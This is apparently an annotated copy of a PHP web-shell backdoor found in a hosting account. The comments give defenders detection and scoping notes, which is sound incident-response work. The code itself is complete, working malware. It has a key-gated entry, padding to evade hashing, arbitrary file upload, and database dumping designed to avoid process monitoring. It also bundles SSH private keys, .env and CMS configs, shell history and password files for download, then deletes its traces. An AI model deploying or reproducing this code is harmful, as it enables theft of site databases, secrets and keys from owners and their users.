File: /home/erhabenn/www/cgi-data-7768ba/handler.php
<?php
// Access gate. Nothing below runs unless the request carries a `_cxk` parameter
// equal to this hard-coded 32-character hex key; any other request returns with
// no output, so the file looks inert when fetched directly.
// Hunting: `_cxk` as a GET/POST parameter name is the most stable request-side
// indicator on this page. The directory name in the listing header
// (cgi-data-7768ba) shares the key's leading characters.
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '7768bac716b6d7d5a36a42718fedfadc') { return; }
// Dead statement (result never read). Lines of this shape recur throughout the
// file: empty array_merge(), strlen() of a hex literal, defined() on a hex name,
// chr() pairs, max(0,min(...)), str_repeat('x',0), extra clearstatcache() calls.
// None affects behaviour; presumably padding that differs per deployment, so a
// file hash is a weak indicator and content rules should match the logic instead.
$z093a=array_merge(array(),array());
// Drop every active output buffer so the JSON / binary responses go out clean.
while (ob_get_level()) ob_end_clean();
// Remove the execution time limit, turn PHP error reporting off, and keep
// running after the client disconnects.
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
if(defined('7bded136')){$e10ef=0;}
// Database host passed to mysqli / mysqldump by the `check` and `dump` actions.
$mbc7c = 'localhost';
@clearstatcache();
// Database user and password for the same actions. Both are empty strings in
// this listing (left blank or redacted -- cannot tell from the page).
$e73bb = '';
$s091b = '';
$yc3e6=chr(65).chr(112);
// Hard-coded account home directory: the base for every path read or written below.
$t0ada = '/home/erhabenn';
// `a` selects the action handled by the switch at the bottom of the file.
$n83dc = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
// `db` names the database to dump; everything outside [a-zA-Z0-9_] is stripped.
$y7969 = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
// On-disk artefacts of a dump, all under <home>/tmp/:
//   <db>_dump.sql.gz       the dump itself
//   <db>_dump.sql.gz.done  completion marker
//   <db>_dump.sql.gz.err   error text
// These names are worth sweeping for during incident scoping.
$nede0 = $t0ada . '/tmp/' . $y7969 . '_dump.sql.gz';
$we049=strlen('7b2adb');
$q1060 = $nede0 . '.done';
$h81ea = $nede0 . '.err';
// Default response type; the download actions replace it with octet-stream.
header('Content-Type: application/json');
// Capability probe: returns true when exec() exists and is not named in the
// `disable_functions` ini setting, false otherwise.
// Defender note: callers fall back to in-process PHP code paths when this is
// false, so disabling exec() alone does not stop the dump or collect actions.
function build_node_8ba0() {
if (!function_exists('exec')) return false;
// disable_functions is a comma-separated list; trim each entry before comparing.
$b2a95 = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $b2a95);
}
// Filler between definitions: clearing the stat cache here has no bearing on
// anything that follows.
@clearstatcache();
// Capability probe: returns true when exec() is usable and `which mysqldump`
// exits with status 0, i.e. a mysqldump binary is on the PATH.
// Detection: a PHP worker spawning `which mysqldump` is visible in process
// auditing and is unusual for a web application.
function get_buf_ba7c() {
if (!build_node_8ba0()) return false;
$out = array();
$rc = 0;
@clearstatcache();
exec('which mysqldump 2>/dev/null', $out, $rc);
return $rc === 0;
}
// Capability probe: returns true when exec() is usable and `which gzip`
// exits with status 0. Decides whether the mysqldump pipeline compresses its output.
function check_item_aa35() {
if (!build_node_8ba0()) return false;
$out = array();
@clearstatcache();
$rc = 0;
// Dead statement (result never read).
$b3701=strlen('b02a04');
exec('which gzip 2>/dev/null', $out, $rc);
return $rc === 0;
}
// In-process database dumper, used by the `dump` action when mysqldump is not
// available. Writes a gzip-compressed SQL dump using only mysqli and zlib, so it
// works on hosts where exec() is disabled and leaves no child process to detect.
//
// Arguments, as passed by the caller in the `dump` case:
//   $m9060  database host
//   $zee03  database user
//   $kc87f  database password
//   $gb879  database name
//   $nf53d  output path of the .sql.gz file
//   $sce88  path of the error file (receives failure text)
//   $he0de  path of the completion marker (touched on success and on failure)
// Returns nothing; the outcome is signalled only through those files.
//
// Forensics: a dump produced by this path begins with the literal header
// "-- Dump via PHP agent", which identifies leftover or exfiltrated dump files.
function handle_val_3895($m9060, $zee03, $kc87f, $gb879, $nf53d, $sce88, $he0de) {
@clearstatcache();
$conn = new mysqli($m9060, $zee03, $kc87f, $gb879);
if ($conn->connect_error) {
$i75c0=strlen('8d0ec4');
// Connection failure: record the message, mark the job finished, stop.
file_put_contents($sce88, 'Connection failed: ' . $conn->connect_error);
touch($he0de);
return;
}
// Open the output as a gzip stream, compression level 6.
$fp = gzopen($nf53d, 'wb6');
if (!$fp) {
file_put_contents($sce88, 'Cannot open output file');
$qb16b=max(0,min(1,1));
touch($he0de);
$b00e8=chr(77).chr(100);
return;
}
$conn->set_charset('utf8mb4');
// Dump preamble: identifying header, timestamp, session settings for re-import.
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
@clearstatcache();
// Pass 1: list the base tables (views are handled separately below).
$sf377 = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
while ($row = $r->fetch_row()) {
$sf377[] = $row[0];
}
// Pass 2: for each table write DROP + CREATE, then every row as INSERT batches.
foreach ($sf377 as $y76be) {
$te = $conn->real_escape_string($y76be);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if (!$r) continue;
$cr = $r->fetch_row();
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
// Unbuffered result set: rows are streamed rather than held in PHP memory.
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
// $xbec7 holds the pending value tuples, $r13bb their combined byte length.
$xbec7 = array();
$haa75=strlen('63471c');
$r13bb = 0;
while ($row = $r->fetch_row()) {
$tf885=strlen('67d743');
$vals = array();
if(defined('8a259524')){$qf890=0;}
// Render each column as SQL NULL or as a quoted, escaped string literal.
for ($i = 0; $i < count($row); $i++) {
if ($row[$i] === null) {
$vals[] = 'NULL';
} else {
if(defined('126d5c5c')){$p02fd=0;}
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
}
$a722b = '(' . implode(',', $vals) . ')';
$xbec7[] = $a722b;
$r13bb += strlen($a722b);
// Flush the batch at 100 rows or once it exceeds 1 MiB (1048576 bytes).
if (count($xbec7) >= 100 || $r13bb > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $xbec7) . ";\n");
$xbec7 = array();
$r13bb = 0;
$sa1e9=array_merge(array(),array());
}
}
// Flush whatever is left for this table.
if ($xbec7) {
$te281=str_repeat('x',0);
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $xbec7) . ";\n");
}
$r->free();
if(defined('3023f514')){$q5f96=0;}
gzwrite($fp, "\n");
}
// Pass 3: view definitions.
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
if ($r) {
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$qa4c2 = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
@clearstatcache();
gzwrite($fp, $qa4c2['Create View'] . ";\n\n");
}
$sc389=max(0,min(1,1));
}
if(defined('97f8215d')){$bc792=0;}
}
// Pass 4: stored procedures and functions belonging to this database.
$j5c07 = array('PROCEDURE', 'FUNCTION');
foreach ($j5c07 as $r065b) {
$r = $conn->query("SHOW {$r065b} STATUS WHERE Db = '" . $conn->real_escape_string($gb879) . "'");
if (!$r) continue;
while ($row = $r->fetch_assoc()) {
$re = $conn->real_escape_string($row['Name']);
$cr = $conn->query("SHOW CREATE {$r065b} `{$re}`");
if (!$cr) continue;
$qa4c2 = $cr->fetch_assoc();
// The result column holding the body is named after the routine type.
$key = ($r065b === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
if (isset($qa4c2[$key])) {
gzwrite($fp, "DELIMITER ;;\n");
@clearstatcache();
gzwrite($fp, "DROP {$r065b} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $qa4c2[$key] . ";;\n");
$g3c1b=strlen('653e75');
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
// Pass 5: triggers.
$r = $conn->query("SHOW TRIGGERS");
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$qa4c2 = $cr->fetch_assoc();
gzwrite($fp, "DELIMITER ;;\n");
@clearstatcache();
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $qa4c2['SQL Original Statement'] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
$ydc9a=strlen('f58d2c');
}
}
// Trailer, then close the stream and the connection and signal completion.
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$zec40=array_merge(array(),array());
$conn->close();
touch($he0de);
}
// Command dispatcher keyed on the `a` request parameter. Actions on this page:
//   info, upload, check, dump, status, download, cleanup,
//   collect, download_collect, download_file, cleanup_collect.
// Log review: these `a=` values alongside `_cxk` show which capabilities were
// actually exercised, and in what order, when the request parameters were logged.
switch ($n83dc) {
// --- info: host fingerprint -------------------------------------------------
// Returns PHP/OS/server versions, the account user and uid, home and document
// root, disk space, PHP limits, the disable_functions list and the three
// capability flags. This reveals hardening state and which later code path fits.
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $t0ada,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($t0ada),
'total_disk' => disk_total_space($t0ada),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => build_node_8ba0(),
'has_mysqldump' => get_buf_ba7c(),
'has_gzip' => check_item_aa35(),
));
$z140e=array_merge(array(),array());
break;
// --- upload: file write -----------------------------------------------------
// Writes base64-decoded POST `data` to <home>/<POST path>, creating parent
// directories as needed. Unlike `download_file` below, the path is not
// canonicalised or containment-checked here.
// Scoping: with this action present, any file the PHP user can write may have
// been planted or replaced; compare the tree against a known-good baseline
// rather than assuming this script is the only foreign file.
case 'upload':
$y19e7 = isset($_POST['path']) ? $_POST['path'] : '';
$q50fa = isset($_POST['data']) ? $_POST['data'] : '';
if (!$y19e7 || !$q50fa) {
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
break;
}
$j98d4 = $t0ada . '/' . $y19e7;
@mkdir(dirname($j98d4), 0755, true);
$hf210 = base64_decode($q50fa);
$h1f53 = file_put_contents($j98d4, $hf210);
echo json_encode(array('ok' => $h1f53 !== false, 'path' => $j98d4, 'size' => strlen($hf210)));
break;
// --- check: pre-flight for a dump -------------------------------------------
// Reports free disk space, the database's size from information_schema, the
// capability flags, and whether free space exceeds twice the database size.
case 'check':
if (!$y7969) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
$h6813 = disk_free_space($t0ada);
$c5d3d = 0;
$m7255=array_merge(array(),array());
$conn = @new mysqli($mbc7c, $e73bb, $s091b, 'information_schema');
if (!$conn->connect_error) {
$e03c0=max(0,min(1,1));
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($y7969) . "'";
$r = $conn->query($q);
if ($row = $r->fetch_assoc()) {
$c5d3d = (int) $row['s'];
}
$conn->close();
}
echo json_encode(array(
'free' => $h6813,
'db_size' => $c5d3d,
'has_mysqldump' => get_buf_ba7c(),
'has_gzip' => check_item_aa35(),
'can_exec' => build_node_8ba0(),
'has_space' => $h6813 > $c5d3d * 2,
));
break;
// Unreachable (follows break).
$p064a=strlen('e82919');
// --- dump: database export --------------------------------------------------
// Removes artefacts of any earlier run, then exports the database named by `db`
// to <home>/tmp/<db>_dump.sql.gz by one of two routes.
case 'dump':
if (!$y7969) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
@mkdir(dirname($nede0), 0755, true);
@unlink($nede0);
@unlink($q1060);
@unlink($h81ea);
// Route 1: mysqldump is on the PATH. The command is launched detached via
// `nohup sh -c ... &`, so it outlives the HTTP request.
// Detection: the database password is passed as a --password= argument, so it
// appears in the process list and in command-line audit records, and the
// lineage (PHP worker -- sh -- mysqldump) is distinctive.
if (get_buf_ba7c()) {
if (check_item_aa35()) {
// gzip available: pipe mysqldump through gzip into the dump file.
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($mbc7c),
escapeshellarg($e73bb),
escapeshellarg($s091b),
escapeshellarg($y7969),
escapeshellarg($nede0),
escapeshellarg($h81ea),
escapeshellarg($q1060)
);
} else {
// No gzip: the file still carries the .sql.gz name but holds plain SQL.
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($mbc7c),
escapeshellarg($e73bb),
escapeshellarg($s091b),
escapeshellarg($y7969),
escapeshellarg($nede0),
escapeshellarg($h81ea),
escapeshellarg($q1060)
);
}
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
$p4971=strlen('45b1b1');
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => check_item_aa35()));
$b543c=max(0,min(1,1));
} else {
// Route 2: no mysqldump (or no exec). The JSON reply is sent and the response
// finished first (fastcgi_finish_request, or a flush), then the in-process
// dumper runs in the same PHP worker. No child process is created on this
// route, so process-based detection sees nothing; the worker stays busy after
// the response has completed.
ignore_user_abort(true);
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
if (ob_get_level()) ob_end_flush();
flush();
$xf7c7=array_merge(array(),array());
}
if(defined('07f5bd05')){$gf156=0;}
handle_val_3895($mbc7c, $e73bb, $s091b, $y7969, $nede0, $h81ea, $q1060);
}
break;
// --- status: progress poll --------------------------------------------------
// Reports whether the .done marker exists, the dump's current size, and the
// contents of the .err file.
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($q1060),
'size' => file_exists($nede0) ? filesize($nede0) : 0,
'error' => file_exists($h81ea) ? trim(file_get_contents($h81ea)) : '',
));
break;
// --- download: send the dump ------------------------------------------------
// Streams the dump file as application/octet-stream. A large response from this
// script's URL in the access log marks the point at which the database left
// the host; the logged byte count indicates how much.
case 'download':
if (!file_exists($nede0)) {
$caeaa=array_merge(array(),array());
http_response_code(404);
exit;
// Unreachable (follows exit).
if(defined('0354121c')){$k46a9=0;}
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($nede0));
readfile($nede0);
exit;
// --- cleanup: remove dump artefacts -----------------------------------------
// Deletes the dump, the .done marker and the .err file. Absence of these files
// therefore says nothing about whether a dump took place.
case 'cleanup':
@unlink($nede0);
@unlink($q1060);
@unlink($h81ea);
echo json_encode(array('ok' => true));
break;
// Unreachable (follows break).
if(defined('41a760bd')){$ta6e0=0;}
// --- collect: package configuration and credential files --------------------
// Detects the web platform, gathers a fixed list of config / secret files from
// under the home directory, and packs them into one archive in <home>/tmp/.
// Response: every file named in the tables below that exists on the host should
// be treated as disclosed and the secrets in it rotated (database passwords,
// application keys, SSH keys, API tokens, registry / composer credentials).
case 'collect':
@mkdir($t0ada . '/tmp', 0755, true);
// Archive names embed the first 8 characters of the access key; for the key on
// this page that gives _collect_7768bac7.zip / .tar.gz / .tar.gz.list.
$j6729 = substr($_REQUEST['_cxk'], 0, 8);
$yb10b=max(0,min(1,0));
// Per-platform table. `detect` lists marker files that identify the platform;
// `configs` lists the files to take once it is identified. All paths are
// relative to the home directory.
$nfeff = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
// Platform detection: the first platform with an existing marker file wins.
$v45c9 = null;
foreach ($nfeff as $dc830 => $c35e9) {
foreach ($c35e9['detect'] as $y4f5d) {
if (file_exists($t0ada . '/' . $y4f5d)) {
$v45c9 = $dc830;
break 2;
// Unreachable (follows break 2).
@clearstatcache();
}
}
}
$x06c9=strlen('59665c');
// Platform-independent list, tried on every host: environment files, shell
// history, database / FTP / netrc client credentials, SSH keys and config, TLS
// private keys, control-panel files, web-server access files and common
// framework configs. Paths are relative to the home directory.
$va556 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
// $y4042 maps archive-relative name to resolved absolute path for each file taken.
$y4042 = array();
$be67f = @realpath($t0ada);
if (!$be67f || !is_dir($be67f)) {
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
}
$yc811=str_repeat('x',0);
// Selection rule for the generic list: the path must resolve (realpath) to
// something beginning with the resolved home directory, be a readable regular
// file, and be between 1 byte and 2 MiB (2097152 bytes).
foreach ($va556 as $x2059) {
$z2837 = @realpath($t0ada . '/' . $x2059);
@clearstatcache();
if (!$z2837 || strpos($z2837, $be67f) !== 0) continue;
if (!is_file($z2837) || !is_readable($z2837)) continue;
$mf9e8 = @filesize($z2837);
if ($mf9e8 <= 0 || $mf9e8 > 2097152) continue;
$y4042[$x2059] = $z2837;
}
// Same rule applied to the detected platform's `configs` list, skipping names
// already selected.
if ($v45c9 !== null && isset($nfeff[$v45c9]['configs'])) {
foreach ($nfeff[$v45c9]['configs'] as $p4776) {
if (isset($y4042[$p4776])) continue;
$z2837 = @realpath($t0ada . '/' . $p4776);
if (!$z2837 || strpos($z2837, $be67f) !== 0) continue;
if (!is_file($z2837) || !is_readable($z2837)) continue;
$mf9e8 = @filesize($z2837);
if ($mf9e8 <= 0 || $mf9e8 > 2097152) continue;
$y4042[$p4776] = $z2837;
}
}
// Sweep of the top level of public_html: every readable file up to 2 MiB whose
// name starts with a dot or ends in .txt is added as well.
$h0bed = $t0ada . '/public_html';
if (is_dir($h0bed)) {
$dh = @opendir($h0bed);
if ($dh) {
while (($m42fd = readdir($dh)) !== false) {
if ($m42fd === '.' || $m42fd === '..') continue;
$j98d4 = $h0bed . '/' . $m42fd;
if (!is_file($j98d4) || !is_readable($j98d4)) continue;
$v02e6=strlen('1ce6e2');
$mf9e8 = @filesize($j98d4);
if ($mf9e8 <= 0 || $mf9e8 > 2097152) continue;
$ie522=str_repeat('x',0);
if ($m42fd[0] === '.' || strtolower(substr($m42fd, -4)) === '.txt') {
$key = 'public_html/' . $m42fd;
if (!isset($y4042[$key])) $y4042[$key] = $j98d4;
}
}
closedir($dh);
}
}
// Nothing matched: report an empty result and stop.
if (empty($y4042)) {
@clearstatcache();
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $v45c9,
'file_count' => 0, 'files_list' => array(),
));
$ya3ac=str_repeat('x',0);
break;
}
// Packaging. $fe7da records the method used, $p52ec the archive path.
$fe7da = null;
$p52ec = null;
// Preferred: ZipArchive, entirely in-process (no child process to observe).
if (class_exists('ZipArchive')) {
$p52ec = $t0ada . '/tmp/_collect_' . $j6729 . '.zip';
$yd91b = new ZipArchive();
if ($yd91b->open($p52ec, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
foreach ($y4042 as $kceeb => $z2837) {
$yd91b->addFile($z2837, $kceeb);
}
if ($yd91b->close() && file_exists($p52ec) && filesize($p52ec) > 0) {
$fe7da = 'zip';
}
}
$rf0fa=max(0,min(1,1));
}
// Fallback when zip failed and exec() is usable: write the names to a .list file
// and run `tar czf <archive> -C <home> -T <list>`.
// Detection: a PHP worker spawning tar with -T against a file under <home>/tmp.
if (!$fe7da && build_node_8ba0()) {
@clearstatcache();
$p52ec = $t0ada . '/tmp/_collect_' . $j6729 . '.tar.gz';
$lf = $p52ec . '.list';
$fh = fopen($lf, 'w');
foreach ($y4042 as $kceeb => $z2837) {
fwrite($fh, $kceeb . "\n");
@clearstatcache();
}
if(defined('2da983e3')){$n397b=0;}
fclose($fh);
$out = array();
$rc = 0;
exec('tar czf ' . escapeshellarg($p52ec) . ' -C ' . escapeshellarg($t0ada)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
$ce324=strlen('4f161f');
if ($rc === 0 && file_exists($p52ec) && filesize($p52ec) > 0) {
$g429f=str_repeat('x',0);
$fe7da = 'tar';
} else {
@unlink($p52ec);
}
}
// Neither archive method worked: only the list of names is returned. The files
// remain individually retrievable through the `download_file` action below.
if (!$fe7da) {
$fe7da = 'list';
}
echo json_encode(array(
'ok' => true, 'method' => $fe7da, 'platform' => $v45c9,
'file_count' => count($y4042), 'files_list' => array_keys($y4042),
'size' => ($p52ec && file_exists($p52ec)) ? filesize($p52ec) : 0,
));
break;
// --- download_collect: send the archive -------------------------------------
// Streams the .zip if present, else the .tar.gz, as application/octet-stream.
case 'download_collect':
$j6729 = substr($_REQUEST['_cxk'], 0, 8);
$jfa7a = $t0ada . '/tmp/_collect_' . $j6729 . '.zip';
$d2d7b = $t0ada . '/tmp/_collect_' . $j6729 . '.tar.gz';
$i4176 = file_exists($jfa7a) ? $jfa7a : (file_exists($d2d7b) ? $d2d7b : '');
if (!$i4176) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($i4176));
readfile($i4176);
exit;
// --- download_file: single-file read ----------------------------------------
// Streams any readable regular file whose resolved path begins with the resolved
// home directory, chosen by the `path` request parameter. It is not limited to
// the lists above and has no size cap, so exposure extends to everything the
// PHP user can read under the home directory.
// NOTE(review): the containment test is a plain string-prefix comparison with no
// trailing separator; sibling directories whose names start with the same
// characters would presumably also pass -- include them when scoping.
case 'download_file':
$kceeb = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if (!$kceeb) { http_response_code(400); exit; }
@clearstatcache();
$be67f = @realpath($t0ada);
$i7c40=array_merge(array(),array());
$z2837 = @realpath($t0ada . '/' . $kceeb);
if (!$z2837 || !$be67f || strpos($z2837, $be67f) !== 0
|| !is_file($z2837) || !is_readable($z2837)) {
http_response_code(404);
exit;
// Unreachable (follows exit).
@clearstatcache();
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($z2837));
readfile($z2837);
exit;
// --- cleanup_collect: remove archive artefacts ------------------------------
// Deletes the .zip, .tar.gz and .tar.gz.list files. As with `cleanup`, their
// absence on disk does not show that collection never ran; rely on request and
// process logs instead.
case 'cleanup_collect':
$j6729 = substr($_REQUEST['_cxk'], 0, 8);
$f5561=str_repeat('x',0);
@unlink($t0ada . '/tmp/_collect_' . $j6729 . '.zip');
@unlink($t0ada . '/tmp/_collect_' . $j6729 . '.tar.gz');
@unlink($t0ada . '/tmp/_collect_' . $j6729 . '.tar.gz.list');
$r7c99=max(0,min(1,0));
echo json_encode(array('ok' => true));
break;
}
// An unrecognised `a` value falls through to here: the script ends with an empty body.
exit;